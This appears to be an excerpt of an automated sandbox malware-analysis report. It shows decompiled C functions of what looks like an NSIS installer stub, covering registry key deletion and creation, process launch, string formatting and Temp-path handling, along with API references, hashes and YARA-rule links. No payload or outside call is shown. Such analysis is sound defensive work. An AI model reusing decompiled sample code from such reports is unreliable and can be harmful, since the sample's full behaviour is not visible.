                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                        • String ID: ?B
                                                                                                        • API String ID: 2987980305-117478770
                                                                                                        • Opcode ID: bbef6d334c2bb730698496685ff769ac622b2bb5dc5f46c6922e2c1a943cafbf
                                                                                                        • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                                        • Opcode Fuzzy Hash: bbef6d334c2bb730698496685ff769ac622b2bb5dc5f46c6922e2c1a943cafbf
                                                                                                        • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                                                                                                        0x00402a57
                                                                                                        0x00402a5f
                                                                                                        0x00402a87
                                                                                                        0x00402a71
                                                                                                        0x00402ac1
                                                                                                        0x00402ac7
                                                                                                        0x00000000
                                                                                                        0x00402ac9
                                                                                                        0x00402a85
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402a85
                                                                                                        0x00402a9c
                                                                                                        0x00402aa4
                                                                                                        0x00402aab
                                                                                                        0x00402ad7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402adf
                                                                                                        0x00402ae7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402ae7
                                                                                                        0x00000000
                                                                                                        0x00402aba
                                                                                                        0x00402ace

                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1912718029-0
                                                                                                        • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                        • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                                        • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                        • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                        0x00401ccb
                                                                                                        0x00401cd2
                                                                                                        0x00401d01
                                                                                                        0x00401d09
                                                                                                        0x00401d10
                                                                                                        0x00401d10
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 00401CC5
                                                                                                        • GetClientRect.USER32 ref: 00401CD2
                                                                                                        • LoadImageA.USER32 ref: 00401CF3
                                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1849352358-0
                                                                                                        • Opcode ID: c0b5d6f5fd98bc6365335fa1ca8c03edfb6534782bc97ff6e07cc3447251dcb0
                                                                                                        • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                                        • Opcode Fuzzy Hash: c0b5d6f5fd98bc6365335fa1ca8c03edfb6534782bc97ff6e07cc3447251dcb0
                                                                                                        • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 40%
                                                                                                        			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t33;
				signed int _t35;
				signed int _t38;
				unsigned int _t45;

				_t45 = _a12;
				_push(0x14);
				_pop(0);
				_t33 = 0xffffffdc;
				if(_t45 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t33 = 0xffffffdd;
				}
				if(_t45 < 0x400) {
					_t33 = 0xffffffde;
				}
				if(_t45 < 0xffff3333) {
					_t38 = 0x14;
					asm("cdq");
					_t45 = _t45 + 1 / _t38;
				}
				_push(E00405B88(_t33, 0, _t45,  &_v36, 0xffffffdf));
				_push(E00405B88(_t33, 0, _t45,  &_v68, _t33));
				_t21 = _t45 & 0x00ffffff;
				_t35 = 0xa;
				_push(((_t45 & 0x00ffffff) + _t21 * 4 + (_t45 & 0x00ffffff) + _t21 * 4 >> 0) % _t35);
				_push(_t45 >> 0);
				_push("%u.%u%s%s");
				_t26 = E00405B88(_t33, 0, 0x4204a0, 0x4204a0, _a8);
				_push(0x4204a0);
				L00405B7C();
				wsprintfA(_t26 + _t26);
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}













                                                                                                        0x004046f9
                                                                                                        0x004046fd
                                                                                                        0x00404705
                                                                                                        0x00404708
                                                                                                        0x00404709
                                                                                                        0x0040470b
                                                                                                        0x0040470d
                                                                                                        0x00404710
                                                                                                        0x00404710
                                                                                                        0x00404717
                                                                                                        0x0040471d
                                                                                                        0x0040471d
                                                                                                        0x00404724
                                                                                                        0x0040472f
                                                                                                        0x00404730
                                                                                                        0x00404733
                                                                                                        0x00404733
                                                                                                        0x00404740
                                                                                                        0x0040474b
                                                                                                        0x0040474e
                                                                                                        0x00404760
                                                                                                        0x00404767
                                                                                                        0x00404768
                                                                                                        0x00404769
                                                                                                        0x00404777
                                                                                                        0x0040477c
                                                                                                        0x0040477f
                                                                                                        0x00404787
                                                                                                        0x004047a3

                                                                                                        APIs
                                                                                                        • lstrlen.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                                        • wsprintfA.USER32 ref: 00404787
                                                                                                        • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                        • String ID: %u.%u%s%s
                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                        • Opcode ID: 87794c8f90da6e594bd2e0cae66498bbfb5b9cbb1a5c5e50d1da5967a7fbc4b5
                                                                                                        • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                                        • Opcode Fuzzy Hash: 87794c8f90da6e594bd2e0cae66498bbfb5b9cbb1a5c5e50d1da5967a7fbc4b5
                                                                                                        • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                        0x00401bb6
                                                                                                        0x00401bc2
                                                                                                        0x00401bc5
                                                                                                        0x00401bce
                                                                                                        0x00401bce
                                                                                                        0x00401bd1
                                                                                                        0x00401bd5
                                                                                                        0x00401bde
                                                                                                        0x00401bde
                                                                                                        0x00401be1
                                                                                                        0x00401be5
                                                                                                        0x00401be7
                                                                                                        0x00401c34
                                                                                                        0x00401c36
                                                                                                        0x00401c3f
                                                                                                        0x00401c47
                                                                                                        0x00401c4a
                                                                                                        0x00401c4a
                                                                                                        0x00401c53
                                                                                                        0x00000000
                                                                                                        0x00401be9
                                                                                                        0x00401bf0
                                                                                                        0x00401bf2
                                                                                                        0x00401bfa
                                                                                                        0x00401bfd
                                                                                                        0x00401c25
                                                                                                        0x00401c59
                                                                                                        0x00401c59
                                                                                                        0x00401bff
                                                                                                        0x00401c0d
                                                                                                        0x00401c15
                                                                                                        0x00401c18
                                                                                                        0x00401c18
                                                                                                        0x00401bfd
                                                                                                        0x00401c5c
                                                                                                        0x00401c5f
                                                                                                        0x00401c65
                                                                                                        0x00402833
                                                                                                        0x00402833
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Timeout
                                                                                                        • String ID: !
                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                        • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                        • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                                        • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                        • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                        0x004053cf
                                                                                                        0x004053eb
                                                                                                        0x004053f3
                                                                                                        0x004053f8
                                                                                                        0x00000000
                                                                                                        0x004053fe
                                                                                                        0x00405402

                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004053F8
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
                                                                                                        • Error launching installer, xrefs: 004053D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                        • API String ID: 3712363035-2984075973
                                                                                                        • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                        • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                                        • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                        • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 53%
                                                                                                        			E00405659(void* __eax, char* _a4) {
				char* _t6;

				_t6 = _a4;
				_push(_t6);
				L00405B7C();
				if( *(CharPrevA(_t6, __eax + _t6)) != 0x5c) {
					_push(0x409010);
					_push(_t6);
					L00405B82();
				}
				return _t6;
			}




                                                                                                        0x0040565a
                                                                                                        0x0040565e
                                                                                                        0x0040565f
                                                                                                        0x00405671
                                                                                                        0x00405673
                                                                                                        0x00405678
                                                                                                        0x00405679
                                                                                                        0x00405679
                                                                                                        0x00405681

                                                                                                        APIs
                                                                                                        • lstrlen.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
                                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
                                                                                                        • lstrcat.KERNEL32(?,00409010), ref: 00405679
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405659
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 2659869361-3916508600
                                                                                                        • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                        • Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
                                                                                                        • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                        • Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402303, Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				void* _t25;
				int _t26;
				intOrPtr _t34;
				void* _t36;

				_t15 = E00402AEB(__eax);
				_t34 =  *((intOrPtr*)(_t36 - 0x14));
				 *(_t36 - 0x30) =  *(_t36 - 0x10);
				 *(_t36 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t30 =  *0x423f50 | 0x00000002;
				 *(_t36 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t26, _t26, _t26,  *0x423f50 | 0x00000002, _t26, _t36 + 8, _t26);
				if(_t19 == 0) {
					if(_t34 == 1) {
						_t25 = E004029F6(0x23);
						_push(0x40a370);
						L00405B7C();
						_t19 = _t25 + 1;
					}
					if(_t34 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t34;
					}
					if(_t34 == 3) {
						_t19 = E00402F18(_t30,  *((intOrPtr*)(_t36 - 0x18)), _t26, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t36 + 8),  *(_t36 - 0x44), _t26,  *(_t36 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t36 - 4) = _t26;
					}
					_push( *(_t36 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t36 - 4);
				return 0;
			}











                                                                                                        0x00402304
                                                                                                        0x00402309
                                                                                                        0x00402313
                                                                                                        0x0040231d
                                                                                                        0x00402320
                                                                                                        0x00402330
                                                                                                        0x0040233a
                                                                                                        0x00402341
                                                                                                        0x00402349
                                                                                                        0x00402357
                                                                                                        0x0040235b
                                                                                                        0x00402360
                                                                                                        0x00402361
                                                                                                        0x00402366
                                                                                                        0x00402366
                                                                                                        0x0040236a
                                                                                                        0x0040236e
                                                                                                        0x00402374
                                                                                                        0x00402379
                                                                                                        0x00402379
                                                                                                        0x0040237d
                                                                                                        0x00402389
                                                                                                        0x00402389
                                                                                                        0x004023a2
                                                                                                        0x004023a4
                                                                                                        0x004023a4
                                                                                                        0x004023a7
                                                                                                        0x0040247d
                                                                                                        0x0040247d
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                                        • lstrlen.KERNEL32(0040A370,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A370,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040A370,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1356686001-0
                                                                                                        • Opcode ID: c2905ab82e3d4f742e931df821d979397d372fc6ead50470bf6aaaad3d431b7f
                                                                                                        • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                                        • Opcode Fuzzy Hash: c2905ab82e3d4f742e931df821d979397d372fc6ead50470bf6aaaad3d431b7f
                                                                                                        • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 43%
                                                                                                        			E00401EC5(char __ebx, char* __edi, char* __esi) {
				intOrPtr _t18;
				void* _t29;

				_t18 = E004029F6(0xffffffee);
				 *((intOrPtr*)(_t29 - 0x2c)) = _t18;
				_push(_t29 - 0x30);
				_push(_t18);
				L00406A54();
				 *__esi = __ebx;
				 *((intOrPtr*)(_t29 - 8)) = _t18;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t29 - 4)) = 1;
				if(_t18 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						_push(__eax);
						_push( *((intOrPtr*)(__ebp - 8)));
						_push(__ebx);
						_push( *((intOrPtr*)(__ebp - 0x2c)));
						L00406A4E();
						if(__eax != 0) {
							__eax = __ebp - 0x44;
							_push(__ebp - 0x44);
							__eax = __ebp - 0x34;
							_push(__eax);
							_push(0x409010);
							_push( *(__ebp + 8));
							L00406A48();
							if(__eax != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t29 - 4));
				return 0;
			}





                                                                                                        0x00401ec7
                                                                                                        0x00401ecf
                                                                                                        0x00401ed2
                                                                                                        0x00401ed3
                                                                                                        0x00401ed4
                                                                                                        0x00401ed9
                                                                                                        0x00401edd
                                                                                                        0x00401ee0
                                                                                                        0x00401ee2
                                                                                                        0x00401ee9
                                                                                                        0x00401ef2
                                                                                                        0x00401efa
                                                                                                        0x00401efd
                                                                                                        0x00401f03
                                                                                                        0x00401f04
                                                                                                        0x00401f07
                                                                                                        0x00401f08
                                                                                                        0x00401f0b
                                                                                                        0x00401f12
                                                                                                        0x00401f14
                                                                                                        0x00401f17
                                                                                                        0x00401f18
                                                                                                        0x00401f1b
                                                                                                        0x00401f1c
                                                                                                        0x00401f21
                                                                                                        0x00401f24
                                                                                                        0x00401f2b
                                                                                                        0x00401f34
                                                                                                        0x00401f40
                                                                                                        0x00401f45
                                                                                                        0x00401f45
                                                                                                        0x00401f2b
                                                                                                        0x00401f48
                                                                                                        0x00401b75
                                                                                                        0x00401b75
                                                                                                        0x00401efd
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • 746814E0.VERSION(00000000,?,000000EE), ref: 00401ED4
